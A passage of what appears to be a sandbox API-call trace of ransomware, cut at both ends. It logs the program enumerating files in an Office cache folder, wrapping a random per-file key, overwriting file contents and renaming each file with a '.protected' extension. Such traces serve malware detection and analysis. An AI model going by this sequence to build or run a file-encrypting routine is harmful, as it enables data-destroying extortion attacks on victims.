(lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW (lpFirst="msvcr90.dll", lpSrch=".zip") returned 0x0 [0059.006] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.401] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.401] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.402] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.402] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.403] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.403] CloseHandle (hObject=0xb4) returned 1 [0059.403] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.protected") returned 88 [0059.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.protected")) returned 1 [0059.404] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Windows") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Program Files") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Program Files (x86)") returned -1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="$Recycle.bin") returned 1 [0059.404] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="System Volume Information") returned -1 [0059.404] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.404] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".protected") returned 0x0 [0059.404] lstrcmpW (lpString1="OfficeLR.cab", lpString2="RESTORE_FILES.txt") returned -1 [0059.404] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.405] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".txt") returned 0x0 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".rar") returned 0x0 [0059.405] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0059.405] StrStrW (lpFirst="OfficeLR.cab", lpSrch=".zip") returned 0x0 [0059.405] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.408] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.408] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.420] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.420] CloseHandle (hObject=0xb4) returned 1 [0059.425] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.protected") returned 89 [0059.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.protected")) returned 1 [0059.426] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Windows") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Program Files") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Program Files (x86)") returned -1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="$Recycle.bin") returned 1 [0059.426] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="System Volume Information") returned -1 [0059.426] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".protected") returned 0x0 [0059.426] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="RESTORE_FILES.txt") returned -1 [0059.426] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.426] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.426] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".txt") returned 0x0 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".rar") returned 0x0 [0059.426] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0059.426] StrStrW (lpFirst="OfficeMUI.msi", lpSrch=".zip") returned 0x0 [0059.426] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.437] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.437] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.446] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.446] CloseHandle (hObject=0xb4) returned 1 [0059.447] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.protected") returned 90 [0059.447] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.protected")) returned 1 [0059.447] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Windows") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Program Files") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Program Files (x86)") returned -1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="$Recycle.bin") returned 1 [0059.447] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="System Volume Information") returned -1 [0059.447] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.447] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".protected") returned 0x0 [0059.447] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="RESTORE_FILES.txt") returned -1 [0059.447] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.447] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.447] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".txt") returned 0x0 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".rar") returned 0x0 [0059.448] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0059.448] StrStrW (lpFirst="OfficeMUI.xml", lpSrch=".zip") returned 0x0 [0059.448] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x15b5, lpOverlapped=0x0) returned 1 [0059.461] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffea4b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x15b5, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x15b5, lpOverlapped=0x0) returned 1 [0059.461] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.461] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.461] CloseHandle (hObject=0xb4) returned 1 [0059.461] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.protected") returned 90 [0059.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.xml.protected")) returned 1 [0059.462] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Windows") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Program Files") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Program Files (x86)") returned -1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="$Recycle.bin") returned 1 [0059.462] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="System Volume Information") returned -1 [0059.462] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".protected") returned 0x0 [0059.462] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="RESTORE_FILES.txt") returned -1 [0059.462] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.462] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.462] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".txt") returned 0x0 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".rar") returned 0x0 [0059.462] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0059.462] StrStrW (lpFirst="OfficeMUISet.msi", lpSrch=".zip") returned 0x0 [0059.462] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.467] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.467] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0059.467] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.467] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.468] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.468] CloseHandle (hObject=0xb4) returned 1 [0059.476] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.protected") returned 93 [0059.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.msi.protected")) returned 1 [0059.476] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Windows") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Program Files") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Program Files (x86)") returned -1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="$Recycle.bin") returned 1 [0059.476] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="System Volume Information") returned -1 [0059.476] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.476] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".protected") returned 0x0 [0059.476] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="RESTORE_FILES.txt") returned -1 [0059.476] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.477] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.477] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".txt") returned 0x0 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".rar") returned 0x0 [0059.477] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0059.477] StrStrW (lpFirst="OfficeMUISet.xml", lpSrch=".zip") returned 0x0 [0059.477] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0059.487] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffccd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x333, lpOverlapped=0x0) returned 1 [0059.487] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.487] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.487] CloseHandle (hObject=0xb4) returned 1 [0059.487] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.protected") returned 93 [0059.487] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.protected")) returned 1 [0059.488] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Windows") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Program Files") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="Program Files (x86)") returned -1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="$Recycle.bin") returned 1 [0059.488] lstrcmpiW (lpString1="osetupui.dll", lpString2="System Volume Information") returned -1 [0059.488] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0059.488] StrStrIW (lpFirst="osetupui.dll", lpSrch=".protected") returned 0x0 [0059.488] lstrcmpW (lpString1="osetupui.dll", lpString2="RESTORE_FILES.txt") returned -1 [0059.488] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.488] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.488] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) 